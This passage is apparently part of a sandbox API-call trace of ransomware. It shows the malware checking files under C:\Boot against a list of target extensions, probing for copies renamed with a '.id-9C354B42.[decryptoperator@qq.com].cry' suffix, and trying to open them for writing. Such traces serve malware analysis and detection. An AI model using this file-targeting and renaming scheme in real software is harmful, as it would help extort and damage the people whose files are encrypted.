(lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.560] lstrlenW (lpString=".1cd") returned 4 [0035.560] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.560] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.560] lstrlenW (lpString=".jpg") returned 4 [0035.560] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.560] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.560] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.560] lstrlenW (lpString=".doc") returned 4 [0035.560] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.560] lstrlenW (lpString=".docx") returned 5 [0035.560] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.560] lstrlenW (lpString=".pdf") returned 4 [0035.560] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.560] lstrlenW (lpString=".xls") returned 4 [0035.560] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.560] lstrlenW (lpString=".xlsx") returned 5 [0035.560] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.561] lstrlenW (lpString=".ppt") returned 4 [0035.561] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.561] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.561] lstrlenW (lpString=".zip") returned 4 [0035.561] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.561] lstrlenW (lpString=".rar") returned 4 [0035.561] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.561] lstrlenW (lpString=".bz2") returned 4 [0035.561] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.561] lstrlenW (lpString=".7z") returned 3 [0035.561] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.561] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.561] lstrlenW (lpString=".dbf") returned 4 [0035.561] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.561] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.561] lstrlenW (lpString=".1cd") returned 4 [0035.561] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.561] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0035.561] lstrlenW (lpString=".jpg") returned 4 [0035.561] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.561] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.561] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.561] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.561] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=90688) returned 1 [0035.561] CloseHandle (hObject=0x178) returned 1 [0035.561] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0035.562] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.562] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.562] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.562] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.562] lstrlenW (lpString=".doc") returned 4 [0035.562] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.562] lstrlenW (lpString=".docx") returned 5 [0035.562] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.562] lstrlenW (lpString=".pdf") returned 4 [0035.562] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.562] lstrlenW (lpString=".xls") returned 4 [0035.562] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.562] lstrlenW (lpString=".xlsx") returned 5 [0035.562] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.562] lstrlenW (lpString=".ppt") returned 4 [0035.562] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.562] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.562] lstrlenW (lpString=".zip") returned 4 [0035.562] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.562] lstrlenW (lpString=".rar") returned 4 [0035.562] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.562] lstrlenW (lpString=".bz2") returned 4 [0035.562] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.562] lstrlenW (lpString=".7z") returned 3 [0035.562] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.562] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.562] lstrlenW (lpString=".dbf") returned 4 [0035.562] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.562] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.562] lstrlenW (lpString=".1cd") returned 4 [0035.562] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.562] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.562] lstrlenW (lpString=".jpg") returned 4 [0035.562] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.563] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.563] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.563] lstrlenW (lpString=".doc") returned 4 [0035.563] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.563] lstrlenW (lpString=".docx") returned 5 [0035.563] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.563] lstrlenW (lpString=".pdf") returned 4 [0035.563] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.563] lstrlenW (lpString=".xls") returned 4 [0035.563] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.563] lstrlenW (lpString=".xlsx") returned 5 [0035.563] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.563] lstrlenW (lpString=".ppt") returned 4 [0035.563] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.563] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.563] lstrlenW (lpString=".zip") returned 4 [0035.563] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.563] lstrlenW (lpString=".rar") returned 4 [0035.563] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.563] lstrlenW (lpString=".bz2") returned 4 [0035.563] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.563] lstrlenW (lpString=".7z") returned 3 [0035.563] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.563] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.563] lstrlenW (lpString=".dbf") returned 4 [0035.563] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.563] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.563] lstrlenW (lpString=".1cd") returned 4 [0035.563] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.563] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0035.563] lstrlenW (lpString=".jpg") returned 4 [0035.564] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.564] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.564] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.564] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.564] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=90704) returned 1 [0035.564] CloseHandle (hObject=0x178) returned 1 [0035.564] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0035.564] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.564] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.564] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.564] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.564] lstrlenW (lpString=".doc") returned 4 [0035.564] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.564] lstrlenW (lpString=".docx") returned 5 [0035.564] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.564] lstrlenW (lpString=".pdf") returned 4 [0035.564] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.564] lstrlenW (lpString=".xls") returned 4 [0035.564] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.564] lstrlenW (lpString=".xlsx") returned 5 [0035.564] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.565] lstrlenW (lpString=".ppt") returned 4 [0035.565] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.565] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.565] lstrlenW (lpString=".zip") returned 4 [0035.565] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.565] lstrlenW (lpString=".rar") returned 4 [0035.565] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.565] lstrlenW (lpString=".bz2") returned 4 [0035.565] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.565] lstrlenW (lpString=".7z") returned 3 [0035.565] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.565] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.565] lstrlenW (lpString=".dbf") returned 4 [0035.565] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.565] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.565] lstrlenW (lpString=".1cd") returned 4 [0035.565] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.565] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.565] lstrlenW (lpString=".jpg") returned 4 [0035.565] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.565] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.565] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.565] lstrlenW (lpString=".doc") returned 4 [0035.565] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.565] lstrlenW (lpString=".docx") returned 5 [0035.565] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.565] lstrlenW (lpString=".pdf") returned 4 [0035.565] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.565] lstrlenW (lpString=".xls") returned 4 [0035.565] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.565] lstrlenW (lpString=".xlsx") returned 5 [0035.565] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.565] lstrlenW (lpString=".ppt") returned 4 [0035.565] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.565] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.565] lstrlenW (lpString=".zip") returned 4 [0035.565] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.565] lstrlenW (lpString=".rar") returned 4 [0035.565] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.566] lstrlenW (lpString=".bz2") returned 4 [0035.566] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.566] lstrlenW (lpString=".7z") returned 3 [0035.566] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.566] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.566] lstrlenW (lpString=".dbf") returned 4 [0035.566] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.566] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.566] lstrlenW (lpString=".1cd") returned 4 [0035.566] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.566] lstrlenW (lpString="C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 29 [0035.566] lstrlenW (lpString=".jpg") returned 4 [0035.566] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.566] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.566] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.566] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.566] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=76352) returned 1 [0035.566] CloseHandle (hObject=0x178) returned 1 [0035.566] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui")) returned 0x20 [0035.566] GetFileAttributesW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.566] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.566] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.566] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.566] lstrlenW (lpString=".doc") returned 4 [0035.567] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.567] lstrlenW (lpString=".docx") returned 5 [0035.567] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.567] lstrlenW (lpString=".pdf") returned 4 [0035.567] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.567] lstrlenW (lpString=".xls") returned 4 [0035.567] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.567] lstrlenW (lpString=".xlsx") returned 5 [0035.567] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.567] lstrlenW (lpString=".ppt") returned 4 [0035.567] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.567] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.567] lstrlenW (lpString=".zip") returned 4 [0035.567] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.567] lstrlenW (lpString=".rar") returned 4 [0035.567] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.567] lstrlenW (lpString=".bz2") returned 4 [0035.567] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.567] lstrlenW (lpString=".7z") returned 3 [0035.567] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.567] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.567] lstrlenW (lpString=".dbf") returned 4 [0035.567] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.567] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.567] lstrlenW (lpString=".1cd") returned 4 [0035.567] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.567] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.567] lstrlenW (lpString=".jpg") returned 4 [0035.567] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.567] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.567] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.567] lstrlenW (lpString=".doc") returned 4 [0035.567] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.567] lstrlenW (lpString=".docx") returned 5 [0035.567] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.567] lstrlenW (lpString=".pdf") returned 4 [0035.567] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.567] lstrlenW (lpString=".xls") returned 4 [0035.568] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.568] lstrlenW (lpString=".xlsx") returned 5 [0035.568] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.568] lstrlenW (lpString=".ppt") returned 4 [0035.568] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.568] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.568] lstrlenW (lpString=".zip") returned 4 [0035.568] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.568] lstrlenW (lpString=".rar") returned 4 [0035.568] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.568] lstrlenW (lpString=".bz2") returned 4 [0035.568] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.568] lstrlenW (lpString=".7z") returned 3 [0035.568] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.568] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.568] lstrlenW (lpString=".dbf") returned 4 [0035.568] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.568] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.568] lstrlenW (lpString=".1cd") returned 4 [0035.568] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.568] lstrlenW (lpString="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 29 [0035.568] lstrlenW (lpString=".jpg") returned 4 [0035.568] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.568] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.568] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.568] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.568] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=75344) returned 1 [0035.568] CloseHandle (hObject=0x178) returned 1 [0035.569] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui")) returned 0x20 [0035.569] GetFileAttributesW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.569] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.569] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.569] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.569] lstrlenW (lpString=".doc") returned 4 [0035.569] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.569] lstrlenW (lpString=".docx") returned 5 [0035.569] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.569] lstrlenW (lpString=".pdf") returned 4 [0035.569] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.569] lstrlenW (lpString=".xls") returned 4 [0035.569] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.569] lstrlenW (lpString=".xlsx") returned 5 [0035.569] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.569] lstrlenW (lpString=".ppt") returned 4 [0035.569] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.569] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.569] lstrlenW (lpString=".zip") returned 4 [0035.569] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.569] lstrlenW (lpString=".rar") returned 4 [0035.569] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.569] lstrlenW (lpString=".bz2") returned 4 [0035.569] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.569] lstrlenW (lpString=".7z") returned 3 [0035.569] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.569] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.569] lstrlenW (lpString=".dbf") returned 4 [0035.569] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.569] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.569] lstrlenW (lpString=".1cd") returned 4 [0035.569] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.569] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.569] lstrlenW (lpString=".jpg") returned 4 [0035.570] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.570] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.570] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.570] lstrlenW (lpString=".doc") returned 4 [0035.570] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.570] lstrlenW (lpString=".docx") returned 5 [0035.570] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.570] lstrlenW (lpString=".pdf") returned 4 [0035.570] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.570] lstrlenW (lpString=".xls") returned 4 [0035.570] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.570] lstrlenW (lpString=".xlsx") returned 5 [0035.570] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.570] lstrlenW (lpString=".ppt") returned 4 [0035.570] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.570] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.570] lstrlenW (lpString=".zip") returned 4 [0035.570] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.570] lstrlenW (lpString=".rar") returned 4 [0035.570] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.570] lstrlenW (lpString=".bz2") returned 4 [0035.570] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.570] lstrlenW (lpString=".7z") returned 3 [0035.570] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.570] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.570] lstrlenW (lpString=".dbf") returned 4 [0035.570] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.570] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.570] lstrlenW (lpString=".1cd") returned 4 [0035.570] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.570] lstrlenW (lpString="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 29 [0035.570] lstrlenW (lpString=".jpg") returned 4 [0035.570] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.570] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0035.570] lstrlenW (lpString="memtest.exe") returned 11 [0035.571] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0035.571] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=485760) returned 1 [0035.571] CloseHandle (hObject=0x178) returned 1 [0035.571] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe")) returned 0x20 [0035.571] GetFileAttributesW (lpFileName="C:\\Boot\\memtest.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\memtest.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.571] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.571] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.571] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.571] lstrlenW (lpString=".doc") returned 4 [0035.571] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0035.571] lstrlenW (lpString=".docx") returned 5 [0035.571] lstrcmpiW (lpString1=".docx", lpString2="t.exe") returned -1 [0035.571] lstrlenW (lpString=".pdf") returned 4 [0035.571] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0035.571] lstrlenW (lpString=".xls") returned 4 [0035.571] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0035.571] lstrlenW (lpString=".xlsx") returned 5 [0035.571] lstrcmpiW (lpString1=".xlsx", lpString2="t.exe") returned -1 [0035.571] lstrlenW (lpString=".ppt") returned 4 [0035.571] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0035.571] lstrlenW (lpString="C:\\Boot\\memtest.exe") returned 19 [0035.571] lstrlenW (lpString=".zip") returned 4 [0035.571] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0035.571] lstrlenW (lpString=".rar") returned 4 [0035.571] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0035.571] lstrlenW (lpString=".bz2") returned 4 [0035.572] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0035.572] lstrlenW (lpString=".7z") returned 3 [0035.572] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0035.574] MoveFileW (lpExistingFileName="C:\\MSOCache\\All 